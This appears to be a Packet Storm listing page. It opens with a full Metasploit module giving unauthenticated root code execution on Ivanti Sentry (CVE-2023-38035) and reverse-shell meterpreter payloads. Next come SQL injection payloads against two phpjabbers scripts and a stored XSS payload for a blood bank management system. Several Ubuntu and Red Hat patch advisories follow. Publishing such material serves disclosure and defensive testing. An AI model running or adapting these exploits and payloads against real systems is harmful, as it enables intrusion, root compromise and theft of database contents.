This Metasploit module exploits an authentication bypass in Ivanti Sentry which exposes API functionality which allows for code execution in the context of the root user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-38035)',        'Description' => %q{          This module exploits an authentication bypass in Ivanti Sentry which exposes API functionality which          allows for code execution in the context of the root user.        },        'Author' => [          'Zach Hanley',    # Analysis & PoC          'James Horseman', # Analysis & PoC          'jheysel-r7'      # Msf module        ],        'References' => [          [ 'URL', 'https://github.com/horizon3ai/CVE-2023-38035'],          [ 'URL', 'https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/'],          [ 'CVE', '2023-38035']        ],        'License' => MSF_LICENSE,        'DefaultOptions' => {          'RPORT' => 8443,          'SSL' => true,          'FETCH_WRITABLE_DIR' => '/tmp'        },        'Platform' => ['unix', 'linux'],        'Privileged' => false,        'Arch' => [ ARCH_CMD, ARCH_X64 ],        'Targets' => [          [            'Unix (In-Memory)',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper,              'DefaultOptions' => {                'CMDSTAGER::FLAVOR' => :curl,                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-08-21',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options(      [        OptBool.new('USE_SUDO', [true, 'Execute payload as root using sudo', true]),        OptInt.new('SLEEP', [true, 'How long to wait for each command to run. Because the execution context does not allow for command piping or chaining the module needs to split the multi command payload by semi-colon and send each command individually', 3 ]),      ]    )  end  def check    # Unauthenticated access to the vulnerable endpoint was removed in patched versions of Sentry.    # Send an unsupported GET request and see if it responds politely.    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, '/mics/services/MICSLogService'),      'method' => 'GET'    )    return Exploit::CheckCode::Unknown('The target did not respond to the vulnerable endpoint') unless res    return Exploit::CheckCode::Safe("A vulnerable instance should respond with an HTTP 405 with the string: 'HessianServiceExporter only supports POST requests' in the response body") unless res.code == 405 && res.body.include?('HessianServiceExporter only supports POST requests')    Exploit::CheckCode::Appears  end  def execute_command(cmd, _opts = {})    # Below is the Hessian binary web service protocol wrapper required to invoke the function `uploadFileUsingFileInput`    # which allows for unauthenticated command execution in the context of the root user.    # More info on Hessian: http://hessian.caucho.com/doc/hessian-1.0-spec.xtp#Headers    exploit_header = "c\x01\x00m\x00\x18uploadFileUsingFileInputMS\x00\x07commandS\x00"    exploit_footer = "S\x00\x06isRootTzNz"    # The sink in this RCE is java's Runtime.getRuntime.exec(). So we must prefix our command with 'sh -c $@|sh .echo'    # in order to obtain full shell functionality, more info: https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html    cmd = "sh -c $@|sh . echo #{cmd}"    cmd = "sudo #{cmd}" if datastore['USE_SUDO']    vprint_status('Running the command: ' + cmd)    # Prepend the command with the length of the command as per Hessian notation    data = exploit_header + [cmd.length].pack('C') + cmd + exploit_footer    res = send_request_raw(      'uri' => normalize_uri(target_uri.path, '/mics/services/MICSLogService'),      'method' => 'POST',      'data' => data    )    fail_with(Failure::Unreachable, 'The target did not respond to the exploit attempt') unless res    fail_with(Failure::UnexpectedReply, "The response from a successful exploit attempt should be a HTTP 200 with 'isRunning' in the response body.") unless res.code == 200 && res.body.include?('isRunning')  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  endend

Ivanti Sentry Authentication Bypass / Remote Code Execution

Ubuntu Security Notice 6358-1 - It was discovered that RedCloth incorrectly handled certain inputs during html sanitisation. An attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6358-1  
September 12, 2023

ruby-redcloth vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

RedCloth could be made to crash if it received specially crafted  
input.

Software Description:  
- ruby-redcloth: Textile module for Ruby

Details:

It was discovered that RedCloth incorrectly handled certain inputs during  
html sanitisation. An attacker could possibly use this issue to cause a  
denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   ruby-redcloth                   4.3.2-4ubuntu0.23.04.1

Ubuntu 22.04 LTS:  
   ruby-redcloth                   4.3.2-4ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
   ruby-redcloth                   4.3.2-3+deb10u1build0.20.04.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   ruby-redcloth                   4.3.2-3ubuntu0.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   ruby-redcloth                   4.2.9-5ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6358-1  
   CVE-2023-31606

Package Information:  
   https://launchpad.net/ubuntu/+source/ruby-redcloth/4.3.2-4ubuntu0.23.04.1  
   https://launchpad.net/ubuntu/+source/ruby-redcloth/4.3.2-4ubuntu0.22.04.1  
   https://launchpad.net/ubuntu/+source/ruby-redcloth/4.3.2-3+deb10u1build0.20.04.1

Ubuntu Security Notice USN-6358-1

PHP Shopping Cart version 4.2 suffers from a remote SQL injection vulnerability.

    ## Title: PHP Shopping Cart-4.2 Multiple-SQLi## Author: nu11secur1ty## Date: 09/13/2023## Vendor: https://www.phpjabbers.com/## Software:https://www.phpjabbers.com/php-shopping-cart-script/#sectionPricing## Reference: https://portswigger.net/web-security/sql-injection## Description:The `id` parameter appears to be vulnerable to SQL injection attacks.A single quote was submitted in the id parameter, and a database errormessage was returned. Two single quotes were then submitted and theerror message disappeared. The attacker easily can steal allinformation from the database of this web application!WARNING! All of you: Be careful what you buy! This will be your responsibility!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: id (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: controller=pjFront&action=pjActionGetStocks&id=1') OR NOT3795=3795-- sRcp&session_id=    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (GTID_SUBSET)    Payload: controller=pjFront&action=pjActionGetStocks&id=1') ANDGTID_SUBSET(CONCAT(0x71717a6b71,(SELECT(ELT(3820=3820,1))),0x7178627871),3820)-- kQZA&session_id=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND(SELECT 2625 FROM (SELECT(SLEEP(5)))nVyA)-- FGLs&session_id=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Shopping-Cart-4.2)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/php-shopping-cart-42-multiple-sqli.html)## Time spent:00:37:00

PHP Shopping Cart 4.2 SQL Injection

Fundraising Script version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Fundraising Script-1.0 SQLi## Author: nu11secur1ty## Date: 09/13/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/fundraising-script/#sectionDemo## Reference: https://portswigger.net/web-security/sql-injection## Description:The `cid` parameter appears to be vulnerable to SQL injection attacks.The payload ' was submitted in the cid parameter, and a database errormessage was returned.The database is empty, but if it is not, this will be over for themoney of the donors and their bank accounts!The attacker can steal all information from the database!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: cid (GET)    Type: error-based    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)    Payload: controller=pjFront&action=pjActionLoadCampaign&cid=(UPDATEXML(1741,CONCAT(0x2e,0x71626b7071,(SELECT(ELT(1741=1741,1))),0x7162787171),3873))---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Fundraising-Script-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/fundraising-script-10-sqli.html)## Time spent:01:15:00

Fundraising Script 1.0 SQL Injection

Ubuntu Security Notice 6362-1 - Kevin Jones discovered that .NET did not properly process certain X.509 certificates. An attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6362-1  
September 12, 2023

dotnet6, dotnet7 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS

Summary:

.NET could be made to crash if it received a specially crafted request.

Software Description:  
- dotnet6: dotNET CLI tools and runtime  
- dotnet7: dotNET CLI tools and runtime

Details:

Kevin Jones discovered that .NET did not properly process certain  
X.509 certificates. An attacker could possibly use this issue to  
cause a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   aspnetcore-runtime-6.0           6.0.122-0ubuntu1~23.04.1  
   aspnetcore-runtime-7.0           7.0.111-0ubuntu1~23.04.1  
   dotnet-host 6.0.122-0ubuntu1~23.04.1  
   dotnet-host-7.0                        7.0.111-0ubuntu1~23.04.1  
   dotnet-hostfxr-6.0                    6.0.122-0ubuntu1~23.04.1  
   dotnet-hostfxr-7.0                    7.0.111-0ubuntu1~23.04.1  
   dotnet-runtime-6.0                   6.0.122-0ubuntu1~23.04.1  
   dotnet-runtime-7.0                   7.0.111-0ubuntu1~23.04.1  
   dotnet-sdk-6.0                          6.0.122-0ubuntu1~23.04.1  
   dotnet-sdk-7.0                          7.0.111-0ubuntu1~23.04.1  
   dotnet6 6.0.122-0ubuntu1~23.04.1  
   dotnet7 7.0.111-0ubuntu1~23.04.1

Ubuntu 22.04 LTS:  
   aspnetcore-runtime-6.0          6.0.122-0ubuntu1~22.04.1  
   aspnetcore-runtime-7.0          7.0.111-0ubuntu1~22.04.1  
   dotnet-host                             6.0.122-0ubuntu1~22.04.1  
   dotnet-host-7.0                       7.0.111-0ubuntu1~22.04.1  
   dotnet-hostfxr-6.0                   6.0.122-0ubuntu1~22.04.1  
   dotnet-hostfxr-7.0                   7.0.111-0ubuntu1~22.04.1  
   dotnet-runtime-6.0                  6.0.122-0ubuntu1~22.04.1  
   dotnet-runtime-7.0                  7.0.111-0ubuntu1~22.04.1  
   dotnet-sdk-6.0                        6.0.122-0ubuntu1~22.04.1  
   dotnet-sdk-7.0                        7.0.111-0ubuntu1~22.04.1  
   dotnet6 6.0.122-0ubuntu1~22.04.1  
   dotnet7 7.0.111-0ubuntu1~22.04.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6362-1  
   CVE-2023-36799

Package Information:  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.122-0ubuntu1~23.04.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.111-0ubuntu1~23.04.1  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.122-0ubuntu1~22.04.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.111-0ubuntu1~22.04.1

Ubuntu Security Notice USN-6362-1

Red Hat Security Advisory 2023-5081-01 - The librsvg2 packages provide a Scalable Vector Graphics library based on the libart library.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: librsvg2 security update  
Advisory ID:       RHSA-2023:5081-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5081  
Issue date:        2023-09-12  
CVE Names:         CVE-2023-38633   
=====================================================================

1. Summary:

An update for librsvg2 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The librsvg2 packages provide a Scalable Vector Graphics (SVG) library  
based on the libart library.

Security Fix(es):

* librsvg: Arbitrary file read when xinclude href has special characters  
(CVE-2023-38633)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2224945 - CVE-2023-38633 librsvg: Arbitrary file read when xinclude href has special characters

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
librsvg2-2.50.7-1.el9_2.1.src.rpm

aarch64:  
librsvg2-2.50.7-1.el9_2.1.aarch64.rpm  
librsvg2-debuginfo-2.50.7-1.el9_2.1.aarch64.rpm  
librsvg2-debugsource-2.50.7-1.el9_2.1.aarch64.rpm  
librsvg2-devel-2.50.7-1.el9_2.1.aarch64.rpm  
librsvg2-tools-2.50.7-1.el9_2.1.aarch64.rpm  
librsvg2-tools-debuginfo-2.50.7-1.el9_2.1.aarch64.rpm

ppc64le:  
librsvg2-2.50.7-1.el9_2.1.ppc64le.rpm  
librsvg2-debuginfo-2.50.7-1.el9_2.1.ppc64le.rpm  
librsvg2-debugsource-2.50.7-1.el9_2.1.ppc64le.rpm  
librsvg2-devel-2.50.7-1.el9_2.1.ppc64le.rpm  
librsvg2-tools-2.50.7-1.el9_2.1.ppc64le.rpm  
librsvg2-tools-debuginfo-2.50.7-1.el9_2.1.ppc64le.rpm

s390x:  
librsvg2-2.50.7-1.el9_2.1.s390x.rpm  
librsvg2-debuginfo-2.50.7-1.el9_2.1.s390x.rpm  
librsvg2-debugsource-2.50.7-1.el9_2.1.s390x.rpm  
librsvg2-devel-2.50.7-1.el9_2.1.s390x.rpm  
librsvg2-tools-2.50.7-1.el9_2.1.s390x.rpm  
librsvg2-tools-debuginfo-2.50.7-1.el9_2.1.s390x.rpm

x86_64:  
librsvg2-2.50.7-1.el9_2.1.i686.rpm  
librsvg2-2.50.7-1.el9_2.1.x86_64.rpm  
librsvg2-debuginfo-2.50.7-1.el9_2.1.i686.rpm  
librsvg2-debuginfo-2.50.7-1.el9_2.1.x86_64.rpm  
librsvg2-debugsource-2.50.7-1.el9_2.1.i686.rpm  
librsvg2-debugsource-2.50.7-1.el9_2.1.x86_64.rpm  
librsvg2-devel-2.50.7-1.el9_2.1.i686.rpm  
librsvg2-devel-2.50.7-1.el9_2.1.x86_64.rpm  
librsvg2-tools-2.50.7-1.el9_2.1.x86_64.rpm  
librsvg2-tools-debuginfo-2.50.7-1.el9_2.1.i686.rpm  
librsvg2-tools-debuginfo-2.50.7-1.el9_2.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-38633  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlAINkAAoJENzjgjWX9erEmkgP/0vJfSsohnRgUIB7UneTgOQq  
ksqb1fvDRc8CeDpZZeqIOL/q+F7tZzxlb8GFT6Q5P/RJn5wG1ESA2fQ8jkTr7CVs  
983vvdl3fSSx3urMQM5jqVFhHfeogGiGEAqLnLUqNpC1MTvoGEH7iqLlWqKYiNJc  
T3eHbMcYAmFNdFqPaPeifzb6GfU4lv2LSNU3CLMOLBftFcEJ7pEcl6i8m0EVgVoX  
clT39XoMKZ+TAEOOxCTbM6LN08PvlTdotVDDH2XcTzdCMVmA0aT8zNF4CPfLlah9  
Tct7OU8FWijKKNAWNZ1+ONtjUmZMgGX+/Yv2Yj2dNTiClFbq29KlZ3zFERb/mOUP  
EHa9T6HuXtahdDPcuHbJeK91u4w3gpCfGxBkj2Vw7omMQWfj4NeXb/iOdrsiVhtE  
HSx41yeNenmhvfLPF6tmQDzmeqFZje/+Vt+lP+N/terWuKJwoH8UeTb+twFTgNj/  
XDAg0kCjizZG5420wh33ZKhY9n3S6t4F8C2Y+RUP3gNttwWCYsctPq2U9OAhvBcw  
Ig6nI4PV3bjv9wXKyKMeP0DY6Br2UQ0vJpnIhZFUQPrWU4WQgq3UhAGccNtpSKVL  
tz2Sqf9otYPFBiQ3l6PIKN2owZzN2Ht+fjeMqukMY2tI6jwe+NnGBHxR6SO+vSLJ  
A6bsmvUGhaPMXXG5jzJJ  
=pDni  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5081-01

Ubuntu Security Notice 6361-1 - It was discovered that CUPS incorrectly authenticated certain remote requests. A remote attacker could possibly use this issue to obtain recently printed documents.

==========================================================================  
Ubuntu Security Notice USN-6361-1  
September 12, 2023

cups vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

CUPS could be made to expose sensitive information.

Software Description:  
- cups: Common UNIX Printing System(tm)

Details:

It was discovered that CUPS incorrectly authenticated certain remote  
requests. A remote attacker could possibly use this issue to obtain  
recently printed documents.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   cups                            2.4.2-3ubuntu2.4

Ubuntu 22.04 LTS:  
   cups                            2.4.1op1-1ubuntu4.6

Ubuntu 20.04 LTS:  
   cups                            2.3.1-9ubuntu1.5

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6361-1  
   CVE-2023-32360

Package Information:  
   https://launchpad.net/ubuntu/+source/cups/2.4.2-3ubuntu2.4  
   https://launchpad.net/ubuntu/+source/cups/2.4.1op1-1ubuntu4.6  
   https://launchpad.net/ubuntu/+source/cups/2.3.1-9ubuntu1.5

Ubuntu Security Notice USN-6361-1

Blood Bank and Donor Management System version 2.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS# Application: Blood Donor Management System# Version: v2.2   # Bugs:  Stored XSS# Technology: PHP# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/# Date: 12.09.2023# Author: SoSPiro# Tested on: Windows#POC========================================1. Login to admin account2. Go to /admin/update-contactinfo.php3. Change "Adress" or " Email id " or " Contact Number" inputs and add "/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('1') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e" payload.4. Go to http://bbdms.local/inedx.php page and XSS will be triggered.

Blood Bank And Donor Management System 2.2 Cross Site Scripting

Red Hat Security Advisory 2023-5080-01 - Keylime is a TPM based highly scalable remote boot attestation and runtime integrity measurement solution. Issues addressed include bypass and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: keylime security update  
Advisory ID:       RHSA-2023:5080-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5080  
Issue date:        2023-09-12  
CVE Names:         CVE-2023-38200 CVE-2023-38201   
=====================================================================

1. Summary:

An update for keylime is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Keylime is a TPM based highly scalable remote boot attestation and runtime  
integrity measurement solution.

Security Fix(es):

* keylime: registrar is subject to a DoS against SSL connections  
(CVE-2023-38200)

* Keylime: challenge-response protocol bypass during agent registration  
(CVE-2023-38201)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2222692 - CVE-2023-38200 keylime: registrar is subject to a DoS against SSL connections  
2222693 - CVE-2023-38201 Keylime: challenge-response protocol bypass during agent registration

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
keylime-6.5.2-6.el9_2.src.rpm

aarch64:  
keylime-6.5.2-6.el9_2.aarch64.rpm  
keylime-base-6.5.2-6.el9_2.aarch64.rpm  
keylime-registrar-6.5.2-6.el9_2.aarch64.rpm  
keylime-tenant-6.5.2-6.el9_2.aarch64.rpm  
keylime-verifier-6.5.2-6.el9_2.aarch64.rpm  
python3-keylime-6.5.2-6.el9_2.aarch64.rpm

noarch:  
keylime-selinux-6.5.2-6.el9_2.noarch.rpm

ppc64le:  
keylime-6.5.2-6.el9_2.ppc64le.rpm  
keylime-base-6.5.2-6.el9_2.ppc64le.rpm  
keylime-registrar-6.5.2-6.el9_2.ppc64le.rpm  
keylime-tenant-6.5.2-6.el9_2.ppc64le.rpm  
keylime-verifier-6.5.2-6.el9_2.ppc64le.rpm  
python3-keylime-6.5.2-6.el9_2.ppc64le.rpm

s390x:  
keylime-6.5.2-6.el9_2.s390x.rpm  
keylime-base-6.5.2-6.el9_2.s390x.rpm  
keylime-registrar-6.5.2-6.el9_2.s390x.rpm  
keylime-tenant-6.5.2-6.el9_2.s390x.rpm  
keylime-verifier-6.5.2-6.el9_2.s390x.rpm  
python3-keylime-6.5.2-6.el9_2.s390x.rpm

x86_64:  
keylime-6.5.2-6.el9_2.x86_64.rpm  
keylime-base-6.5.2-6.el9_2.x86_64.rpm  
keylime-registrar-6.5.2-6.el9_2.x86_64.rpm  
keylime-tenant-6.5.2-6.el9_2.x86_64.rpm  
keylime-verifier-6.5.2-6.el9_2.x86_64.rpm  
python3-keylime-6.5.2-6.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-38200  
https://access.redhat.com/security/cve/CVE-2023-38201  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlAINJAAoJENzjgjWX9erE59cP/RFf4gSKE5W1ar8Yy+/89EcT  
GupcC9vnwiLF92vcCWo6LbC7hWUxVkeJTpOI9MKNfNy4bMuRO287MVLu8oLskuhS  
zhV6A09qbxFCzocBi/J4P4QO/2QDqI1mmz5mHVPstsbRjnUZg7fxiQv583ygCb/j  
8JDz365XI8fWRhZg3X4wskYbd1D0LLT1n2lJKKtcU9jEMEKg4J5hDJLs2WpFRpsd  
tb54ufNiDkrOS9V5hzFdVjGZ8Kmez5G/Tj3s/Y2mZvRSzemmDv9ayPjotsLdfV9w  
4FBwVCZr1wbxX4KnWDXM1VrObwy6gUq05WQDhTrzxXUC2i1VeQCPUEyCObY+jOFd  
QyibRKLssQQTBfz4ByoL3eRLpqDi8d58DR40R/lQSQuZ+u/42l20T8GifZqT0GHD  
WB5aie4BtKY1ayozq3PUda2hNfVxQfzGw1CXidiKN/gB1si6EWR0CCHv4lQ7ttiV  
n5l9IXbdw3FQVudFwBqUI8fxeLdDWypFWr+ld4LnzOb9n3YYXrL5Ba1J2A0cBfBT  
8xpfxpkuWyBrCDDGP6Alq2WdQrHCIsR4B4ncIbPzdyrM1RXJjEsXkTBc7w6tRhXZ  
G+N4kMsFJyux/FY5tisI2c2nou0hWRNfGaqXBssFDbkdrpoRfTmGM9mNAJHqyfji  
q13+zKgAfEACx42A5+CP  
=Rfhb  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5080-01

Ubuntu Security Notice 6360-1 - It was discovered that FLAC incorrectly handled encoding certain files. A remote attacker could use this issue to cause FLAC to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6360-1September 12, 2023flac vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:FLAC could be made to crash or run programs as your login if it opened aspecially crafted file.Software Description:- flac: Free Lossless Audio CodecDetails:It was discovered that FLAC incorrectly handled encoding certain files. Aremote attacker could use this issue to cause FLAC to crash, resulting in adenial of service, or possibly execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   flac                            1.3.3-2ubuntu0.2   libflac8                        1.3.3-2ubuntu0.2Ubuntu 20.04 LTS:   flac                            1.3.3-1ubuntu0.2   libflac8                        1.3.3-1ubuntu0.2In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6360-1   CVE-2020-22219Package Information:   https://launchpad.net/ubuntu/+source/flac/1.3.3-2ubuntu0.2   https://launchpad.net/ubuntu/+source/flac/1.3.3-1ubuntu0.2

Source

Packet Storm